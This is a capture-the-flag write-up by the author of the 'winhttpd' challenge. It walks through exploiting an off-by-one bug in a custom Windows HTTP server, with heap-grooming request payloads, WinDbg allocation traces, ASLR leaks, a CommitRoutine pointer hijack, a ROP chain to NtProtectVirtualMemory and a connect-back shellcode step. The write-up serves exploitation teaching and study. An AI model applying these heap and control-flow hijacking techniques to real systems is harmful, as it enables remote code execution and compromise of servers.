winhttpd writeup: private heaps pwning on Windows

Following last week-end’s Insomni’hack teaser and popular demand, here is a detailed write-up for my winhttpd challenge, that implemented a custom multi-threaded httpd and was running on the latest version of Windows 10:

This challenge is running on Windows Server 2019, Version 1809 (OS Build 17763.253).

Since multi-threaded servers have obvious isolation issues for a CTF challenge, you had to first connect to a dispatcher service which would spawn an instance for you on a dedicated port, that only your IP was allowed to access. Then you could send as many requests to the httpd as you like as long as the instance didn’t crash and if you kept the dispatcher socket open.

It all starts with a HeapCreate

The server limits the number of concurrent requests to 5, and each request runs in a dedicated thread, which creates a private heap with HeapCreate(0, 0, 0) and finally destroys it with HeapDestroy(hHeap) when the request terminates.
This means that every request has a clean heap and cannot interfere with other requests’ heaps (yet), making it far easier to have deterministic allocations since you don’t have to worry about whatever occurs on the main heap or in other threads. On the other hand, you loose whatever pointers you could have leaked from the main heap.
Private heaps have their own LFH and thus we also start with no LFH enabled, so we can avoid the LFH randomization altogether as long as we don’t create too many objects of the same size.

After opening several threads we can observe that we get the following heaps:

0:006> !heap
Index   Address  Name      Debugging options enabled
  1:   17ccd2c0000                
  2:   17ccd0b0000                
  3:   17ccd220000                
  4:   17ccd4e0000                
  5:   17ccd260000                
  6:   17ccd6d0000                
  7:   17ccd460000                
  8:   17ccd590000

As you can see :

  • unlike mmap on (non-grsec) Linux, all heaps are mapped in memory at with random offsets ; therefore leaking a heap address doesn’t mean we immediately can leak other heaps or libraries
  • all new heaps are aligned on 0x10000 ; that could come in handy for partial overwrites, however I didn’t actually use it in my exploit 😛

The bugs

The httpd itself doesn’t do much: you can only read local files (without traversal) or login. The login takes username/password/domain parameters, and just greets you if the credentials are valid, or fails. The domain parameter has to be either empty or start with “win.local“, which is the first bug since you can send ““. This will cause the httpd to open a socket on port 12345 to your domain, send “<username>::<password>” on that socket, and wait for the authentication response.

The other bug lies in the custom strcpy_n function that is used to store various variables in the following http_request struct (which is also stored on the heap shortly after the thread creation):

typedef struct {
    char *key;
    char *value;
} dictionary_entry, *dictionary;

typedef struct {
    SOCKET sockfd;
    HANDLE heap;
    char method[16];
    char filename[256];
    char *query_string;
    char protocol[16];
    char hostname[128];
    dictionary headers;
    size_t headers_count;
    dictionary params; /* GET & POST params */
    size_t params_count;
    char *content; /* POST content */
    size_t content_length;
} http_request;

That function has a NULL off-by-one bug, and is called in the following contexts:

strcpy_n(req->method, cursor, sizeof(req->method));

⇨ overflows filename[0], useless (also the method is invalid so request aborts)

strcpy_n(req->filename, cursor, sizeof(req->filename));

⇨ overflows the first byte of query_string, which could be nice however the query_string isn’t allocated yet (NULL)

req->query_string = (char*)HeapAlloc(req->heap, 0, ptr - cursor + 1);
strcpy_n(req->query_string, cursor, ptr - cursor);

⇨ no overflow

strcpy_n(req->protocol, cursor, sizeof(req->protocol));

⇨ overflows hostname[0], useless

if (!_stricmp(key, "Host") && !*req->hostname) {
    strcpy_n(req->hostname, value, sizeof(req->hostname));

⇨ overflows the headers pointer (pointer to a dictionary, which is an array of key-value pointers)

Only the last one is interesting as it means we can make the headers dictionary – which I’ll refer to as headers** from now on – point to controlled memory.
During the parsing of HTTP headers, key-value pairs are added to the headers dictionary by a dict_add() function:

  • the program loops up to req->headers_count times to check if the same header name already exists
  • if it doesn’t, a new key and value are allocated with HeapAlloc()
    • then the dictionary gets extended with HeapReAlloc() and the new pair is appended to the dictionary
  • if it does, the key remains unchanged
    • if the value is <= to strlen(prev_value), the previous bytes are just edited
    • if it is not, the value gets extended with HeapReAlloc()

So if the headers** points in controlled memory, the parsing of next headers could lead to an arbitrary write by editing a valid key with a value that points wherever we want.
Headers are never printed by the application and thus can’t be used directly for an arbitrary read.
dict_add() is also used to add key-value pairs to the params** dictionary.

The initial leak

Before we go further we need an initial leak to bypass ASLR.
If we manage to put the headers** on top of a valid chunk, we can add a new header to cause a HeapReAlloc on that chunk without having to worry about messing up with the allocator’s metadata (inlined or not): as far as it is concerned, this is a valid demand.
If the new size is more than that of the chunk we overlap with, the allocator will try to extend it. If there is enough free space adjacent to the chunk, that will be used and will just increase the size of our chunk, otherwise it’ll allocate new memory and free the old chunk, thereby allowing us to free the overlapped chunk.

Now there’s a catch: before the headers** gets HeapReAlloc()‘ed, dict_add checks if the new header we’re adding exists already, and will therefore loop against all entries of headers**. Since our off-by-one bug gets triggered on a headers** that has at least one entry (the “Host” header itself), dict_add will always try to dereference a key pointer at least once, which is problematic since we haven’t bypassed ASLR yet.

The idea here is that we can use KUSER_SHARED_DATA, a section of memory that is always mapped at 0x7ffe0000 – as can be observed with !address in WinDbg.

0:007> !address

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
+        0`00000000        0`7ffe0000        0`7ffe0000             MEM_FREE    PAGE_NOACCESS                      Free       
+        0`7ffe0000        0`7ffe1000        0`00001000 MEM_PRIVATE MEM_COMMIT  PAGE_READONLY                      Other      [User Shared Data]
+        0`7ffe1000        0`7ffe6000        0`00005000             MEM_FREE    PAGE_NOACCESS                      Free       
+        0`7ffe6000        0`7ffe7000        0`00001000 MEM_PRIVATE MEM_COMMIT  PAGE_READONLY                      <unknown>  [.........5......]
+        0`7ffe7000       bb`f1490000       bb`714a9000             MEM_FREE    PAGE_NOACCESS                      Free       
+       bb`f1490000       bb`f158a000        0`000fa000 MEM_PRIVATE MEM_RESERVE                                    Stack      [~0; 4f8.13c8]
0:007> dt nt!_KUSER_SHARED_DATA 0x7ffe0000
   +0x000 TickCountLowDeprecated : 0
   +0x004 TickCountMultiplier : 0xfa00000
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   +0x020 TimeZoneBias     : _KSYSTEM_TIME
   +0x02c ImageNumberLow   : 0x8664
   +0x02e ImageNumberHigh  : 0x8664
   +0x030 NtSystemRoot     : [260]  "C:\WINDOWS" 
   +0x238 MaxStackTraceDepth : 0
   +0x23c CryptoExponent   : 0

That doesn’t contain any useful pointer for us on Windows 10, but it is perfect to survive a pointer dereference. So we just craft a fake header that points to the NtSystemRoot, which is "C\x00" (unicode string).

The GET parameters stored in params** have a urldecoded value, which allows us to store NULL bytes in the value. Furthemore the username and password params can be leaked over the “domain” socket, therefore we can craft our fake header** in one of these, and free the value. The allocator will insert a FreeList entry (Flink + Blink) inside the free chunk, so printing the value will leak us the Flink and thus the position of the heap!

Let’s see how it works. First we register a few breakpoints to pretty-print our allocations:

bp ntdll!RtlAllocateHeap "r @$t1 = @rcx ; r @$t2 = @edx ; r @$t3 = @r8; g"
bp ntdll!RtlReAllocateHeap "r @$t4 = @rcx ; r @$t5 = @edx ; r @$t6 = @r8; r $t7 = @r9 ; g"
bp winhttpd+24C5 ".printf \"----------------------------------------------------------------------------------------------------\\nNew Heap @ %#p\\n\", @rax ; g"
bp winhttpd+24DD ".printf \"req_head          : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+2508 ".printf \"http_request      : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+2732 ".printf \"req->content      : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+213A ".printf \"req->query_string : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+36DE ".printf \"    dict_add new key       :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+3715 ".printf \"    dict_add new value     :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+374C ".printf \"    dict_add realloc value : HeapReAlloc(%#p, %#x, %#p, %#p) -> %#p\\n\", @$t4, @$t5, @$t6, @$t7, @rax ; g"
bp winhttpd+37FF ".printf \"    dict_add realloc dict  : HeapReAlloc(%#p, %#x, %#p, %#p) -> %#p\\n\", @$t4, @$t5, @$t6, @$t7, @rax ; g"
bp winhttpd+37D0 ".printf \"    dict_add new dict      :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+1D20 ".printf \"Parsing params...\\n\" ; g"
bp winhttpd+22C8 ".printf \"Parsing header...\\n\" ; g"

This is the payload I used:

fake_headers = p64(_KUSER_SHARED_DATA + 0x30) * 6

payload = "POST "
payload += "/login?" + "A" * 0x100 + "&username=" + urlencode(fake_headers) # [1]
payload += " HTTP/1.1\r\n"
payload += "X: " + "Y" * 0x30 + "\r\n"             # [2]
payload += "X: " + "Y" * 0x50 + "\r\n"             # [3]
payload += "A" * 0x40 + ": " + "B" * 0x40 + "\r\n" # [4]
payload += "Host: " + 'X' * 128 + "\r\n"           # [5] trigger off-by-one on headers**
payload += "Z" * 0x40 + ": " + "B" * 0x40 + "\r\n" # [6] HeapReAlloc(headers**) => HeapFree(params[username].value)
payload += "\r\n"

Allocations observed in WinDbg:

0:003> g
New Heap @ 0x17ccd220000
req_head          : HeapAlloc(0x17ccd220000, 0, 0x2000) -> 0x17ccd220860
http_request      : HeapAlloc(0x17ccd220000, 0, 0x1e8) -> 0x17ccd222870
req->query_string : HeapAlloc(0x17ccd220000, 0, 0x1c9) -> 0x17ccd222a60
Parsing params...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x7) -> 0x17ccd222c40
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x17) -> 0x17ccd222c60
    dict_add new dict      :   HeapAlloc(0x17ccd220000, 0, 0x10) -> 0x17ccd222c80
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x9) -> 0x17ccd222ca0
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x101) -> 0x17ccd222cc0
    dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222c80, 0x20) -> 0x17ccd222dd0
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x9) -> 0x17ccd222c80
[1] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x31) -> 0x17ccd222e00
    dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222dd0, 0x30) -> 0x17ccd222e40
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x2) -> 0x17ccd222dd0
[2] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x31) -> 0x17ccd222e80
[2] dict_add new dict      :   HeapAlloc(0x17ccd220000, 0, 0x10) -> 0x17ccd222ec0
Parsing header...
[3] dict_add realloc value : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e80, 0x51) -> 0x17ccd222ee0
Parsing header...
[4] dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd222f40
[4] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd222f90
[4] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222ec0, 0x20) -> 0x17ccd222e80
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x5) -> 0x17ccd222ec0
[5] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x81) -> 0x17ccd222fe0
[5] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e80, 0x30) -> 0x17ccd222e80
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd223070
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd2230c0
[6] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e00, 0x40) -> 0x17ccd223110
0:006> dps 0x17ccd222e00 L6
0000017c`cd222e00  0000017c`cd223160 [6]
0000017c`cd222e08  0000017c`cd220150 [6]
0000017c`cd222e10  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e18  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e20  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e28  00000000`7ffe0030 SharedUserData+0x30

Step-by-step explanation:

  • At [1] we managed to get the username (params[2].value) aligned  with 0x100.
  • At [2] we create a header value whose size is 0x30* ; the headers** size is now 0x10
  • At [3] we realloc that header’s value, leaving a free chunk of size 0x30 available
  • At [4] we create another header, the headers** size is now 0x20, we use a key and value that are larger than 0x30 to avoid consuming the free 0x30 chunk
  • At [5] we perform the off-by-one
    • first the “Host” header is added, the headers** size becomes 0x30, and thus it reuses the free 0x30 chunk
    • the headers** LSBs change from 2e80 to 2e00 because of the off-by-one ⇨ headers** == params[2].value
  • At [6] we add another header, which causes HeapReAlloc to free headers** and allocate headers** further in the heap
    • the allocator puts its Flink and Blink freelist pointers in params[2].value, which we will leak over our “domain socket”

Note*: 0x30 is not the real size, I forgot to consider the terminating NULL bytes and the metadatas’ size in my calculations. It doesn’t matter, what matters is our plan 😉 : that an alloc of 0x41 doesn’t fit into a chunk allocated for 0x31

Because at the end of the request handle_client calls HeapFree on all previously allocated pointers, we want to keep our “domain” socket open as long as possible to avoid a crash. That also avoids the HeapDestroy call which would destroy our heap before we can even use our leak.

Leaking NTDLL

winhttpd doesn’t store any function pointer or pointer to its .data section. We’re in a clean heap, is there anything useful for us in there?

All pointers seem to point inside the current heap except this one:

0:006> dps 0x17ccd220000 L100
0000017c`cd2202b8  00000000`001fe000
0000017c`cd2202c0  00007ff8`92b33d10 ntdll!RtlpStaticDebugInfo+0x90
0000017c`cd2202c8  00000000`ffffffff

This is great because we always can find a pointer into NTDLL. Now we need a strategy to leak its value.

Arbitrary read/write

To obtain an arbitrary write primitive we can overwrite the pointers inside header** and params**. params** is more interesting though because we can also leak the values if the param key is either username or password.

Therefore we will want to overlap header** and param** and once again cause a HeapReAlloc(header**) to free the param** chunk.


content = "A=" + urlencode(flat(  # [8]
    username_heap_thread_1, ntdll_leak_addr,
    password_heap_thread_1, CommitRoutine_mangled_addr, # spoil for later :P
    password_heap_thread_1, CommitRoutine_mangled_addr,
)) + "&" + "&" * 0x100

payload  = "POST "
payload += '/login?a=AAAAAAAAAAAAAAAA&password=' + 'A' * 0xa0 + '&username=BBBBBBBB&username=' + urlencode(fake_headers) # [1]
payload += " HTTP/1.1\r\n"
payload += "Host: " + 'X' * 128 + "\r\n" # [2]
payload += "username: Y\r\n"             # [3]
payload += "X: Y\r\n"                    # [4]
payload += "Content-Length: " + str(len(content)) + "\r\n" # [5]
payload += "X: " + "Y" * 0x50 + "\r\n"   # [6]
payload += "\r\n"
payload += content                       # [7]

Allocations observed in WinDbg:

New Heap @ 0x17ccd260000
req_head          : HeapAlloc(0x17ccd260000, 0, 0x2000) -> 0x17ccd260860
http_request      : HeapAlloc(0x17ccd260000, 0, 0x1e8) -> 0x17ccd262870
req->query_string : HeapAlloc(0x17ccd260000, 0, 0x110) -> 0x17ccd262a60
Parsing params...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262b80
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x11) -> 0x17ccd262ba0
    dict_add new dict      :   HeapAlloc(0x17ccd260000, 0, 0x10) -> 0x17ccd262bc0
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262be0
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0xa1) -> 0x17ccd262c00
    dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262bc0, 0x20) -> 0x17ccd262cb0
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262bc0
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262ce0
[1] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262cb0, 0x30) -> 0x17ccd262d00
    dict_add realloc value : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262ce0, 0x11) -> 0x17ccd262cb0
Parsing header...
[2] dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x5) -> 0x17ccd262ce0
[2] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x81) -> 0x17ccd262d40
[2] dict_add new dict      :   HeapAlloc(0x17ccd260000, 0, 0x10) -> 0x17ccd262dd0
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262df0
[3] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e10
[3] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x20) -> 0x17ccd262d00
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e30
[4] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e50
[4] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x30) -> 0x17ccd262d00
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0xf) -> 0x17ccd262e70
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x4) -> 0x17ccd262e90
[5] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x40) -> 0x17ccd262eb0
Parsing header...
[6] dict_add realloc value : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262e50, 0x51) -> 0x17ccd262f00
[7] req->content      : HeapAlloc(0x17ccd260000, 0, 0x1b2) -> 0x17ccd262f60
Parsing params...
[8] dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e50
[8] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x31) -> 0x17ccd262d00
[8] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x40) -> 0x17ccd263120
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0x80000a, 0x1ca8) -> 0x17ccd262d00
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x17) -> 0x17ccd262d20
    dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd263120, 0x50) -> 0x17ccd260750
0:006> da poi(0x17ccd260750)
0000017c`cd222c80  "username"
0:006> dps poi(0x17ccd260750+8) L1
0000017c`cd2202c0  00007ff8`92b33d10 ntdll!RtlpStaticDebugInfo+0x90

Step-by-step explanation:

    • At [1] we managed to get params** aligned with 0x100
    • At [2] we perform the off-by-one
      • first the “Host” header is added and reuses the old "BBBBBBBB" username, the headers** is created with a size of 0x10
      • the headers** LSBs change from 2dd0 to 2d00 because of the off-by-one ⇨ headers** == params**
    • At [3] we add a header, which is actually an old test that I forgot to remove 😜
      • the headers** size is now 0x20, this still fits in the original size of params**: 0x30. Therefore this doesn’t free or moves it.
    • At [4] we add another header with a small value
      • the headers** size is now 0x30, which still fits in the original size of params**
    • At [5] we add the Content-Length header, which is mandatory to send POST params
      • it makes sure there’s an allocated chunk after the value of [4]
      • the headers** size becomes 0x40,  which causes HeapReAlloc to free headers** and allocate it further in the heap
        • param** is now free
    • At [6] we edit the value of [4], causing a HeapReAlloc
      • since the chunk can’t be extended that much anymore, it frees it and moves it further in the heap
      • we now have a small chunk available for next step
    • At [7] the POST content is allocated, this doesn’t fit in free chunks and therefore gets allocated at the end of the heap
    • At [8] the first POST param is added to params**
      • All pointers in param** can be dereferenced: the program doesn’t crash
      • the key reuses our previously freed small chunk
      • the value overlaps with the free params** itself so we now fully control the values inside params**arbitrary read/write
      • params** gets reallocated, but keeps our crafted key-value pairs

Note that the arbitrary write is limited: we can only edit up to strlen(target) anywhere in memory.

The heap CommitRoutine callback

With the NTDLL base leaked I have no doubt you can find interesting pointers. Many of them seem available but are mangled and without names, which isn’t very cool. You could also leak the TEB and thus other libraries too, unlocking more targets.

On the other hand out of curiosity I wanted to look at what the heap structure looks like. The lame way to find its name (which I used of course) was to google “heap structure windows” which returns this paper as a first result. Then try several of the mentionned structures until one seems legit. Here nt!_HEAP looked ok 🙂

0:006>dt nt!_HEAP 0x17ccd220000
   +0x000 Segment          : _HEAP_SEGMENT
   +0x000 Entry            : _HEAP_ENTRY
   +0x010 SegmentSignature : 0xffeeffee
   +0x014 SegmentFlags     : 2
   +0x018 SegmentListEntry : _LIST_ENTRY [ 0x0000017c`cd220120 - 0x0000017c`cd220120 ]
   +0x028 Heap             : 0x0000017c`cd220000 _HEAP
   +0x030 BaseAddress      : 0x0000017c`cd220000 Void
   +0x038 NumberOfPages    : 0xf
   +0x150 FreeLists        : _LIST_ENTRY [ 0x0000017c`cd222e00 - 0x0000017c`cd223160 ]
   +0x160 LockVariable     : 0x0000017c`cd2202c0 _HEAP_LOCK
   +0x168 CommitRoutine    : 0xf603ad6b`90e97029     long  +f603ad6b90e97029
   +0x170 StackTraceInitVar : _RTL_RUN_ONCE
   +0x178 CommitLimitData  : _RTL_HEAP_MEMORY_LIMIT_DATA
   +0x198 FrontEndHeap     : (null) 
   +0x1a0 FrontHeapLockCount : 0
   +0x1a2 FrontEndHeapType : 0 ''
   +0x1a3 RequestedFrontEndHeapType : 0 ''
   +0x1a8 FrontEndHeapUsageData : 0x0000017c`cd220750  ""
   +0x1b0 FrontEndHeapMaximumIndex : 0x80
   +0x1b2 FrontEndHeapStatusBitmap : [129]  ""
   +0x238 Counters         : _HEAP_COUNTERS
   +0x2b0 TuningParameters : _HEAP_TUNING_PARAMETERS

The CommitRoutine field immediately caught my eye as it sounds like something you can trigger with a large allocation (such as with our Content-Length). The documentation mentions the following:

Callback routine to commit pages from the heap. If this parameter is non-NULL, the heap must be nongrowable. If HeapBase is NULL, CommitRoutine must also be NULL.

However our private heaps are growable since they are created with HeapCreate(0, 0, 0), whose documentation says:

If dwMaximumSize is 0, the heap can grow in size. The heap’s size is limited only by the available memory.

Anyways if we change its value manually in the debugger and trigger a large allocation, it turns out that the callback is indeed called!

0:004> dt nt!_HEAP 1ee`a0a60000 CommitRoutine
   +0x168 CommitRoutine : 0x685d9804`f365ca2b     long  +685d9804f365ca2b
0:004> eq 1ee`a0a60000+168 4142434445464748
0:004> g
(25ac.3eac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007ff8`92a73030 ffe0            jmp     rax {291fdb40`b6238d63}
0:003> r
rax=291fdb40b6238d63 rbx=000001eea0a60000 rcx=000001eea0a60000
rdx=000000363e8ff980 rsi=000001eea0a64fc0 rdi=000001eea0a64fd0
rip=00007ff892a73030 rsp=000000363e8ff918 rbp=000001eea0a60000
 r8=000000363e8ffa28  r9=0000000000003010 r10=00007ff892af09a0
r11=8080808080808080 r12=0000000000000000 r13=000000000000007f
r14=000000363e8ffa28 r15=000001eea0a602e8
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206

As we can see several registers have values in the heap, with rbx, rcx and rbp pointing to the beginning of the heap. Using this along with our (constrained) arbitrary-write, we should be able to pivot to a ROP/JOP chain.

A quick look inside RtlpFindAndCommitPages (from the Stack Trace) shows a xor rax, cs:RtlpHeapKey before the call to the CFG dispatch function (Control Flow Guard isn’t enabled here).

0:003> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 00000036`3e8ff918 00007ff8`929e8773 : 000001ee`a0a60000 00000000`00000000 00000000`00000020 00007ff8`929e01fe : ntdll!guard_dispatch_icall_nop
01 00000036`3e8ff920 00007ff8`929e8433 : 000001ee`a0a65000 000001ee`a0a60000 00000036`3e8ff9d0 00000000`00000010 : ntdll!RtlpFindAndCommitPages+0x87
02 00000036`3e8ff980 00007ff8`929e07b4 : 00000000`00000040 00000000`00000002 00000000`0000007f 00000000`00004000 : ntdll!RtlpExtendHeap+0x33
03 00000036`3e8ffa10 00007ff8`929dda21 : 000001ee`a0a60000 00000000`00000002 00000000`00003001 00000000`00003010 : ntdll!RtlpAllocateHeap+0xf54
04 00000036`3e8ffc80 00007ff6`58072732 : 00000000`00000000 00000000`00000000 000001ee`a0a60a4f 00007ff6`58070000 : ntdll!RtlpAllocateHeapInternal+0x991
05 00000036`3e8ffd70 00007ff8`8fdb7e94 : 00000000`000000b8 00000000`00000000 00000000`00000000 00000000`00000000 : winhttpd!handle_client+0x292
06 00000036`3e8ffe00 00007ff8`92a3a251 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
07 00000036`3e8ffe30 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:003> dq ntdll!RtlpHeapKey L1
00007ff8`92b36808  685d9804`f365ca2b

So the initial value of CommitRoutine was NULL, we can leak the heap XOR key either from a heap or directly in NTDLL.

Finding the address of any heap

This is all great but we can’t trigger a large allocation from any of the previous threads anymore, so we’ll have to create a new one, wait before sending it the HTTP headers, and leak its address in the meantime.

Fortunately NTDLL also keeps a list of our heaps:

0:006> !address

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
+      17c`cd460000      17c`cd465000        0`00005000 MEM_PRIVATE MEM_COMMIT  PAGE_EXECUTE_READWRITE             Heap       [ID: 6; Handle: 0000017ccd460000; Type: Segment]
       17c`cd465000      17c`cd46f000        0`0000a000 MEM_PRIVATE MEM_RESERVE                                    Heap       [ID: 6; Handle: 0000017ccd460000; Type: Segment]
+     7ff8`929d0000     7ff8`929d1000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`929d1000     7ff8`92ae8000        0`00117000 MEM_IMAGE   MEM_COMMIT  PAGE_EXECUTE_READ                  Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92ae8000     7ff8`92b2f000        0`00047000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b2f000     7ff8`92b30000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READWRITE                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b30000     7ff8`92b32000        0`00002000 MEM_IMAGE   MEM_COMMIT  PAGE_WRITECOPY                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b32000     7ff8`92b3a000        0`00008000 MEM_IMAGE   MEM_COMMIT  PAGE_READWRITE                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b3a000     7ff8`92bbd000        0`00083000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
0:006> .for (r $t0 = 7ff8`92b2f000; @$t0 < 7ff8`92b3a000; r $t0 = @$t0 + 8) { .if (poi(@$t0) >= 17c`cd460000 & poi(@$t0) < 17c`cd465000) { dps $t0 L1 } }
00007ff8`92b33bb0  0000017c`cd460000
0:006> dq 0x7ff892b33b80
00007ff8`92b33b80  0000017c`cd2c0000 0000017c`cd0b0000
00007ff8`92b33b90  0000017c`cd220000 0000017c`cd4e0000
00007ff8`92b33ba0  0000017c`cd260000 0000017c`cd6d0000
00007ff8`92b33bb0  0000017c`cd460000 0000017c`cd590000
00007ff8`92b33bc0  00000000`00000000 00000000`00000000
00007ff8`92b33bd0  00000000`00000000 00000000`00000000

We can launch a new thread and the arbitrary read from above to leak its value.

Stack pivot, ROP, shellcode

We have RIP and rbp points to the heap, so we can look for a “leave ; pop ; ret” pivot gadget. This one does the trick:

# leave ; ⇨ mov rsp, rbp ; pop rbp
# mov rbx, qword [rsp+0x18]
# mov rax, rcx
# mov rbp, qword [rsp+0x20]
# mov rsi, qword [rsp+0x28]
# mov rdi, qword [rsp+0x30]
# pop r15
# pop r14
# ret
pivot_gadget = ntdll_base + 0x010442e

The above gadget pivots to the beginning of the heap (rbp) and pops 3 values off the pivoted stack, therefore we must control heap+0x18, which is SegmentListEntry, a heap entry without NULL bytes in its LSBs – so we can edit it.
So, we overwrite:

  • heap+0x168 (CommitRoutine) with pivot_gadget ^ RtlpHeapKey
  • heap+0x18 (SegmentListEntry) with a large “add rsp, 0xXXX” gadget:
    • 0x0d26c4: add rsp, 0x0000000000000CD0 # pop rbx # ret

Now we can store a retsled followed by a ROP chain. Since I didn’t bother to leak any other libs from NTDLL I decided to ROP directly to ntdll!NtProtectVirtualMemory, the syscall used behind the scenes by VirtualProtect – which allows to change the heap page permissions to RWX.

At this point we just need to store a connect-back shellcode after the ROP and jump into it to finally get our shell and read the flag!

$ ./ 42003
[+] Trying to bind to on port 12345: Done
[+] Waiting for connections on Got connection from on port 19224
[+] Opening connection to on port 42003: Done
[*] heap leak: 0x17ccd223160
[+] heap of thread 1 @ 0x17ccd220000
[+] Trying to bind to on port 12345: Done
[+] Waiting for connections on Got connection from on port 19225
[+] Opening connection to on port 42003: Done
[*]   'username' in heap 1 @ 0x17ccd222c80
[*]   ntdll pointer @ 0x17ccd2202c0
[*]   'password' in heap 1 @ 0x17ccd222ca0
[*]   CommitRoutine in heap 1 @ 0x17ccd220168
[+] ntdll!RtlpStaticDebugInfo leak: 0x7ff892b33d10
[+] NTDLL @ 0x7ff8929d0000
[+] ntdll!RtlpHeapKey = 0xf603ad6b90e97029
[+] Trying to bind to on port 12345: Done
[+] Waiting for connections on Got connection from on port 19226
[+] Opening connection to on port 42003: Done
[+] Opening connection to on port 42003: Done
[*]   thread 4 addr stored in ntdll @ 0x7ff892b33bb0
check threads list
[+] target_heap @ 0x17ccd460000
[+] Trying to bind to on port 12345: Done
